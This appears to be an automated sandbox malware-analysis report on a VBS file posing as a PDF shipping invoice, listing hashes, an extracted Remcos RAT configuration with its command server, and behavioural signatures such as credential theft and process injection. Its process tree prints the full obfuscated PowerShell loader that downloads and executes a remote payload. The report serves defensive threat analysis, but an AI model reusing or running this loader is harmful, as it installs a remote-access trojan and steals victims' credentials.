Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 06:12
Static task
static1
Behavioral task
behavioral1
Sample
BUNKER INVOICE ‘MV.SUN OCEAN.pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
BUNKER INVOICE ‘MV.SUN OCEAN.pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
BUNKER INVOICE ‘MV.SUN OCEAN.pdf.vbs
-
Size
17KB
-
MD5
8728fd6ce048778714ac79991e78bbea
-
SHA1
2dd28d298edf6af2ca9f1511d92545c5a3f470a3
-
SHA256
736b1fd992d69ce4f46a4f4fa5b892e659536c493224b68c022d8fd193c5e88a
-
SHA512
9c08b2a198adf14071d86eab3b1c29bec9bbad390952c43f06d1964231df5540fe807ae2d98d7b2198ced3ce9d519352ac4f4b87b25901424794463871fe601a
-
SSDEEP
384:UzVKy+Tt5Q4Lemns5EuZdETHH+ouUY+cTVCtRFBBKg:qVx+Tt5UGsLErLuQc+nBJ
Malware Config
Extracted
remcos
RemoteHost
154.216.18.157:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-N639VY
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/2360-59-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/3172-57-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/2652-56-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/2652-56-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/3172-57-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exemsiexec.exeflow pid Process 14 4796 powershell.exe 24 540 msiexec.exe 25 540 msiexec.exe 27 540 msiexec.exe 29 540 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
msiexec.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Processes:
powershell.exepowershell.exepid Process 4796 powershell.exe 3960 powershell.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WScript.exedescription ioc Process File opened (read-only) \??\Z: WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 540 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 3960 powershell.exe 540 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
msiexec.exedescription pid Process procid_target PID 540 set thread context of 3172 540 msiexec.exe 101 PID 540 set thread context of 2652 540 msiexec.exe 102 PID 540 set thread context of 2360 540 msiexec.exe 103 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exemsiexec.exemsiexec.exemsiexec.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid Process 4796 powershell.exe 4796 powershell.exe 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 3172 msiexec.exe 3172 msiexec.exe 2360 msiexec.exe 2360 msiexec.exe 3172 msiexec.exe 3172 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exemsiexec.exepid Process 3960 powershell.exe 540 msiexec.exe 540 msiexec.exe 540 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid Process Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 2360 msiexec.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exemsiexec.exedescription pid Process procid_target PID 2456 wrote to memory of 4796 2456 WScript.exe 84 PID 2456 wrote to memory of 4796 2456 WScript.exe 84 PID 3960 wrote to memory of 540 3960 powershell.exe 99 PID 3960 wrote to memory of 540 3960 powershell.exe 99 PID 3960 wrote to memory of 540 3960 powershell.exe 99 PID 3960 wrote to memory of 540 3960 powershell.exe 99 PID 540 wrote to memory of 3172 540 msiexec.exe 101 PID 540 wrote to memory of 3172 540 msiexec.exe 101 PID 540 wrote to memory of 3172 540 msiexec.exe 101 PID 540 wrote to memory of 3172 540 msiexec.exe 101 PID 540 wrote to memory of 2652 540 msiexec.exe 102 PID 540 wrote to memory of 2652 540 msiexec.exe 102 PID 540 wrote to memory of 2652 540 msiexec.exe 102 PID 540 wrote to memory of 2652 540 msiexec.exe 102 PID 540 wrote to memory of 2360 540 msiexec.exe 103 PID 540 wrote to memory of 2360 540 msiexec.exe 103 PID 540 wrote to memory of 2360 540 msiexec.exe 103 PID 540 wrote to memory of 2360 540 msiexec.exe 103
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BUNKER INVOICE ‘MV.SUN OCEAN.pdf.vbs"1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Acronycta='Brainworker';;$Macrophytic='Yacca';;$Boardy='Bogskrivningernes';;$Quinquedentate9='synoptist';;$Mijas='Fjern';;$Escalator=$host.Name;function Dagligvarebutikker($Lumsker){If ($Escalator) {$Udloddes=3} for ($Chessart=$Udloddes;;$Chessart+=4){if(!$Lumsker[$Chessart]) { break }$deskriptioners+=$Lumsker[$Chessart]}$deskriptioners}function Taurobolia($Lougheen){ .($Aandedraget) ($Lougheen)}$Gstet=Dagligvarebutikker ' UnNPreeventM s.supwsudETalb WiCB,dL LaIOpseT.enCocT';$smocker=Dagligvarebutikker 'E.oM VeoWilzMusi eml lblKreaN n/';$stemwards=Dagligvarebutikker ',alTGrolJonsObd1Cur2';$omhyggeligstes='B.o[volN ,ne asT Tm.ThesBoreGiorOveV K I MacTreE pip T oskri ilNXenTLamm ,oa U NHa,ALi,gstiETudRNec] o:An :IndsWorEsj Crevu itRCleI Fat TiyEnupr tr eloClatCiroDrkC ffOseiLEjv=Cy $Flis MaT GrELufM ReW emaPonr CudAnas';$smocker+=Dagligvarebutikker 'so 5B t. Fl0 .r til(ColWproiGe.n b,di doAb wOvos to BeaNGnoT i Che1Vel0fre.Di 0 M.; m T.rWAfsi sonAfd6Bun4Mi.;Rev Vikx ,a6Aec4 Ab; mt U,r Div.tr:Hem1 ea3Gar1 H..Brg0Ank)T l forGRuge OvcHaskHatoUle/P.r2Gri0 Bo1Tak0Und0 b1Koi0P l1 M. EnFMedi rnr Kae UnfDyroPrex,lo/Unv1D m3Met1dys.Ci 0';$Apteringernes=Dagligvarebutikker 'Meaugris axE OyR ni- ra .ugsk.eDipnNont';$Gummiest=Dagligvarebutikker 'OvehEpitPretOpipsi :s,u/pja/ R.csuphTakp.puqHon2Me,.Weri,roc,uluBr / snH.aruT sQ VaQLiguHenEPetA aOPre/RevKNetlQuao ila riksereG ar uaiAf.nMu,gDi,s euoRejmM,ar A.aZodaUridA,cesmar G,ncuceBus.sp.c BosFalv';$Behoerig=Dagligvarebutikker ',le>';$Aandedraget=Dagligvarebutikker 'MilIIntEH,rX';$Henriettas='Alterationen';$Micrometers='\Lacertilian.Rev';Taurobolia (Dagligvarebutikker 'K o$ PrgAc LHano FiB.isaso lAne:JalAFumTen TDybRO eAteahMinEi eNZo.t Iz=Ges$ OhEEren ByVPr :BasADo PUskPAppdsluAspiTd.saHum+ yk$ olmsk iVrdcFlyrJe,OMarmEleeKamtPh.ecr,rKros');Taurobolia (Dagligvarebutikker ' ub$FugGsprl lmoT,mbOuaatr l Ba:,jspTz R s.E Rep mraConcAfsKBusI,ntnRkkgJv,=Mo $ DeGun UsubM Fim BjIGibeGits ektI,d.TvasPropChaLHigisoaT nd(V,a$skuBW.lEMorhunco spEBurRUntIKreGPos)');Taurobolia (Dagligvarebutikker $omhyggeligstes);$Gummiest=$Prepacking[0];$Bodemiddel=(Dagligvarebutikker 'E s$ s gBrnL HaOFamb BrARkklsem:BursWhiI yrp smiPr,dT fispetNudys u=FornTi.ETvaw sn-K uoBaabTopjUdpe icc,iptsva un.sLegYFodsskgtKapeCurmNo,.Ale$ afGVu.sE htLevEBa t');Taurobolia ($Bodemiddel);Taurobolia (Dagligvarebutikker 'A r$ Erss yisemp TaistrdP aiTurtUnhyEbr.LucHExteIntaPredOpse arIncs Ka[K.e$ fhAMelpRect.eme arr AmiEffnReegOpieOmsrKiln L.e sts se] Re=K,a$AffsBrnmVocosp cL bkUdve eir');$Worlded=Dagligvarebutikker 'tun$TonsDekiHaapAnvi I.dUn.iVert fryRak. HtDU ko swforn lmlBl.oIdraAurdPolF spiVall UneFun(Cot$MotGIntuOutmT rmTraiParesacs nbt Ho,Tyk$ DyBComeproaLymvR de G.rk piArmtR se .n2sem2 Fl4Con)';$Beaverite224=$Attrahent;Taurobolia (Dagligvarebutikker 'Bes$Preg R LKnkOKarbDomAPrvLWas: patsirHDeaeP,aoFl,m jeaFlaN etiPica.rg=Gen(PattGasE D.s,taTGas-skapUn.a BiTAmpHTil ke $Vi B Keed,ta iVCh.E noRZalI O.TBekeD.s2Dy 2 s4Bek)');while (!$Theomania) {Taurobolia (Dagligvarebutikker ' st$Pa gKoklFreoskub Koahall tr:H sT.kaiN,nlManiUnrnOphtFreeM ntCrugU.poskae cirsldee el Casbe eP.l=Ryg$FodK HoiLoteB,nfB ofs,le.ngr') ;Taurobolia $Worlded;Taurobolia (Dagligvarebutikker 'skrsMulTAltA dbrs.eTLe - LesskoLLaxEUnre.ndpHrd ,ic4');Taurobolia (Dagligvarebutikker 'til$An Grl LCl,OBrab rAB aL Em:,orTPashungeTseOBedM asA eknDisIO eaB,f=Tit(AnsTI tEH as K t ,a- DipbleA P TPolHUdd ae$ Deb WaET.saAttvchaEForR.ntiWistNapesun2.aa2U,r4War)') ;Taurobolia (Dagligvarebutikker 'Lsk$ smG .tlR doPh b aastklJen:Omfi,orr irTwiECatvskoEFi Rarge U n pat ilITypA I,l G.=Bla$Ha gsk lIdeoDribOvna svl Fr: EpDKobEPornsinustrDMo EscrR oesFri+str+mal% a $Misp spR esE kipMa,aNoocVenkDriIAftn LiGBlo.Forcsolo C u Gen,ndT') ;$Gummiest=$Prepacking[$Irreverential]}$Deplane=329663;$Festae=29903;Taurobolia (Dagligvarebutikker 'sar$ApoGForl.opORa BfinadagL Fo: G EKunN arsNo PfirnPr,d ve.irrsupnZooableTFanU PrrF reAftn etsAnd Bgr=Vid U.mG onepreTCaf-NumcInwoBa NM mT smEsliN ClTNie Fe$O hB tyEJubACrivCanEsp RAutifrutMasEse 2Dis2P.s4');Taurobolia (Dagligvarebutikker 'Gen$ Mug .llBlyoKy.b loaFemlsul:ParMLauo FonPreo Kel vei Din.utgBulu E aNecl esfau ef= c Od [FinsLnkyEllsV jtDiseCarm Ko.OveC.ilos vnPlov speJ mr rt.on] ow:Re :.uaF ,frProoPram UlBMeda KesConeNon6spe4s usPiptForr PeiBednMe.gGru(Khm$HovEPr.n AmsDospfr nMa dVi e irrM.nnReaaWidt eauAndrskaeT,en TusRaz)');Taurobolia (Dagligvarebutikker 'al $UdtG salK.rOkraBBanaL bLCo :HooF .kIBalsN,dkB eeDisFKarLVioA,veagumdbadEstar M nAs es,asRso Hy= Tv Un [CausNedy ysMeatAldEal Msub.phat AkE Dex ontTr .MicesarNPrvc CooUn,dsm I randuags.a] O.:fi,: FoAGipsHerCPigIVexiCha.RedGHumeMo tInfs fgTsprR UfiBudnParg.na(Coe$ spm TaoP inUtto.apL .aiRhan W gPamuForaoutLBe.sBri)');Taurobolia (Dagligvarebutikker 'Enc$Re.GOr l ,io hbOstaPu Lsks:UnbkHalIMavRsegKAntE Tesse KDa,iCarBs.l= f$ iFdisIPiasCenkMare k F iLTa,aB uaNonDPi.ED sR agnAnaEHo sMim.s,ysP,oUAgebb dsskrt rrBh i ejnAg gspr( e$CacDamaeVi,PbevlPe ATviNCouePs,,Van$sekfHo E asB,aTsubaPa,e ,a)');Taurobolia $Kirkeskib;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Acronycta='Brainworker';;$Macrophytic='Yacca';;$Boardy='Bogskrivningernes';;$Quinquedentate9='synoptist';;$Mijas='Fjern';;$Escalator=$host.Name;function Dagligvarebutikker($Lumsker){If ($Escalator) {$Udloddes=3} for ($Chessart=$Udloddes;;$Chessart+=4){if(!$Lumsker[$Chessart]) { break }$deskriptioners+=$Lumsker[$Chessart]}$deskriptioners}function Taurobolia($Lougheen){ .($Aandedraget) ($Lougheen)}$Gstet=Dagligvarebutikker ' UnNPreeventM s.supwsudETalb WiCB,dL LaIOpseT.enCocT';$smocker=Dagligvarebutikker 'E.oM VeoWilzMusi eml lblKreaN n/';$stemwards=Dagligvarebutikker ',alTGrolJonsObd1Cur2';$omhyggeligstes='B.o[volN ,ne asT Tm.ThesBoreGiorOveV K I MacTreE pip T oskri ilNXenTLamm ,oa U NHa,ALi,gstiETudRNec] o:An :IndsWorEsj Crevu itRCleI Fat TiyEnupr tr eloClatCiroDrkC ffOseiLEjv=Cy $Flis MaT GrELufM ReW emaPonr CudAnas';$smocker+=Dagligvarebutikker 'so 5B t. Fl0 .r til(ColWproiGe.n b,di doAb wOvos to BeaNGnoT i Che1Vel0fre.Di 0 M.; m T.rWAfsi sonAfd6Bun4Mi.;Rev Vikx ,a6Aec4 Ab; mt U,r Div.tr:Hem1 ea3Gar1 H..Brg0Ank)T l forGRuge OvcHaskHatoUle/P.r2Gri0 Bo1Tak0Und0 b1Koi0P l1 M. EnFMedi rnr Kae UnfDyroPrex,lo/Unv1D m3Met1dys.Ci 0';$Apteringernes=Dagligvarebutikker 'Meaugris axE OyR ni- ra .ugsk.eDipnNont';$Gummiest=Dagligvarebutikker 'OvehEpitPretOpipsi :s,u/pja/ R.csuphTakp.puqHon2Me,.Weri,roc,uluBr / snH.aruT sQ VaQLiguHenEPetA aOPre/RevKNetlQuao ila riksereG ar uaiAf.nMu,gDi,s euoRejmM,ar A.aZodaUridA,cesmar G,ncuceBus.sp.c BosFalv';$Behoerig=Dagligvarebutikker ',le>';$Aandedraget=Dagligvarebutikker 'MilIIntEH,rX';$Henriettas='Alterationen';$Micrometers='\Lacertilian.Rev';Taurobolia (Dagligvarebutikker 'K o$ PrgAc LHano FiB.isaso lAne:JalAFumTen TDybRO eAteahMinEi eNZo.t Iz=Ges$ OhEEren ByVPr :BasADo PUskPAppdsluAspiTd.saHum+ yk$ olmsk iVrdcFlyrJe,OMarmEleeKamtPh.ecr,rKros');Taurobolia (Dagligvarebutikker ' ub$FugGsprl lmoT,mbOuaatr l Ba:,jspTz R s.E Rep mraConcAfsKBusI,ntnRkkgJv,=Mo $ DeGun UsubM Fim BjIGibeGits ektI,d.TvasPropChaLHigisoaT nd(V,a$skuBW.lEMorhunco spEBurRUntIKreGPos)');Taurobolia (Dagligvarebutikker $omhyggeligstes);$Gummiest=$Prepacking[0];$Bodemiddel=(Dagligvarebutikker 'E s$ s gBrnL HaOFamb BrARkklsem:BursWhiI yrp smiPr,dT fispetNudys u=FornTi.ETvaw sn-K uoBaabTopjUdpe icc,iptsva un.sLegYFodsskgtKapeCurmNo,.Ale$ afGVu.sE htLevEBa t');Taurobolia ($Bodemiddel);Taurobolia (Dagligvarebutikker 'A r$ Erss yisemp TaistrdP aiTurtUnhyEbr.LucHExteIntaPredOpse arIncs Ka[K.e$ fhAMelpRect.eme arr AmiEffnReegOpieOmsrKiln L.e sts se] Re=K,a$AffsBrnmVocosp cL bkUdve eir');$Worlded=Dagligvarebutikker 'tun$TonsDekiHaapAnvi I.dUn.iVert fryRak. HtDU ko swforn lmlBl.oIdraAurdPolF spiVall UneFun(Cot$MotGIntuOutmT rmTraiParesacs nbt Ho,Tyk$ DyBComeproaLymvR de G.rk piArmtR se .n2sem2 Fl4Con)';$Beaverite224=$Attrahent;Taurobolia (Dagligvarebutikker 'Bes$Preg R LKnkOKarbDomAPrvLWas: patsirHDeaeP,aoFl,m jeaFlaN etiPica.rg=Gen(PattGasE D.s,taTGas-skapUn.a BiTAmpHTil ke $Vi B Keed,ta iVCh.E noRZalI O.TBekeD.s2Dy 2 s4Bek)');while (!$Theomania) {Taurobolia (Dagligvarebutikker ' st$Pa gKoklFreoskub Koahall tr:H sT.kaiN,nlManiUnrnOphtFreeM ntCrugU.poskae cirsldee el Casbe eP.l=Ryg$FodK HoiLoteB,nfB ofs,le.ngr') ;Taurobolia $Worlded;Taurobolia (Dagligvarebutikker 'skrsMulTAltA dbrs.eTLe - LesskoLLaxEUnre.ndpHrd ,ic4');Taurobolia (Dagligvarebutikker 'til$An Grl LCl,OBrab rAB aL Em:,orTPashungeTseOBedM asA eknDisIO eaB,f=Tit(AnsTI tEH as K t ,a- DipbleA P TPolHUdd ae$ Deb WaET.saAttvchaEForR.ntiWistNapesun2.aa2U,r4War)') ;Taurobolia (Dagligvarebutikker 'Lsk$ smG .tlR doPh b aastklJen:Omfi,orr irTwiECatvskoEFi Rarge U n pat ilITypA I,l G.=Bla$Ha gsk lIdeoDribOvna svl Fr: EpDKobEPornsinustrDMo EscrR oesFri+str+mal% a $Misp spR esE kipMa,aNoocVenkDriIAftn LiGBlo.Forcsolo C u Gen,ndT') ;$Gummiest=$Prepacking[$Irreverential]}$Deplane=329663;$Festae=29903;Taurobolia (Dagligvarebutikker 'sar$ApoGForl.opORa BfinadagL Fo: G EKunN arsNo PfirnPr,d ve.irrsupnZooableTFanU PrrF reAftn etsAnd Bgr=Vid U.mG onepreTCaf-NumcInwoBa NM mT smEsliN ClTNie Fe$O hB tyEJubACrivCanEsp RAutifrutMasEse 2Dis2P.s4');Taurobolia (Dagligvarebutikker 'Gen$ Mug .llBlyoKy.b loaFemlsul:ParMLauo FonPreo Kel vei Din.utgBulu E aNecl esfau ef= c Od [FinsLnkyEllsV jtDiseCarm Ko.OveC.ilos vnPlov speJ mr rt.on] ow:Re :.uaF ,frProoPram UlBMeda KesConeNon6spe4s usPiptForr PeiBednMe.gGru(Khm$HovEPr.n AmsDospfr nMa dVi e irrM.nnReaaWidt eauAndrskaeT,en TusRaz)');Taurobolia (Dagligvarebutikker 'al $UdtG salK.rOkraBBanaL bLCo :HooF .kIBalsN,dkB eeDisFKarLVioA,veagumdbadEstar M nAs es,asRso Hy= Tv Un [CausNedy ysMeatAldEal Msub.phat AkE Dex ontTr .MicesarNPrvc CooUn,dsm I randuags.a] O.:fi,: FoAGipsHerCPigIVexiCha.RedGHumeMo tInfs fgTsprR UfiBudnParg.na(Coe$ spm TaoP inUtto.apL .aiRhan W gPamuForaoutLBe.sBri)');Taurobolia (Dagligvarebutikker 'Enc$Re.GOr l ,io hbOstaPu Lsks:UnbkHalIMavRsegKAntE Tesse KDa,iCarBs.l= f$ iFdisIPiasCenkMare k F iLTa,aB uaNonDPi.ED sR agnAnaEHo sMim.s,ysP,oUAgebb dsskrt rrBh i ejnAg gspr( e$CacDamaeVi,PbevlPe ATviNCouePs,,Van$sekfHo E asB,aTsubaPa,e ,a)');Taurobolia $Kirkeskib;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gkftsaqdnsdbhfeomvyuh"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3172
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jesettawjavgrtssegtwkqfv"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2652
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\tgxwtltyxinktaownrgxvcrmftmx"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD560a0bdc1cf495566ff810105d728af4a
SHA1243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6
SHA256fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2
SHA5124445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5
-
Filesize
468KB
MD5acbcb0c257c857aed90aa263a395e94b
SHA11ccb63ee28b87b954f3638ead3db54ede95294f6
SHA2560a6d7238dbb1388bd77ba2a19bd8af53f58946fee29405939eac811fae0a187a
SHA5124c4cfddc780239cefb68014dd07df5c12036e7704c0c535c6c1f1379aaf954ea0f5b077b1c4e9ddc2eb98e5696dd36c42c993b71d9b28dcbdeea01e6283b5b9e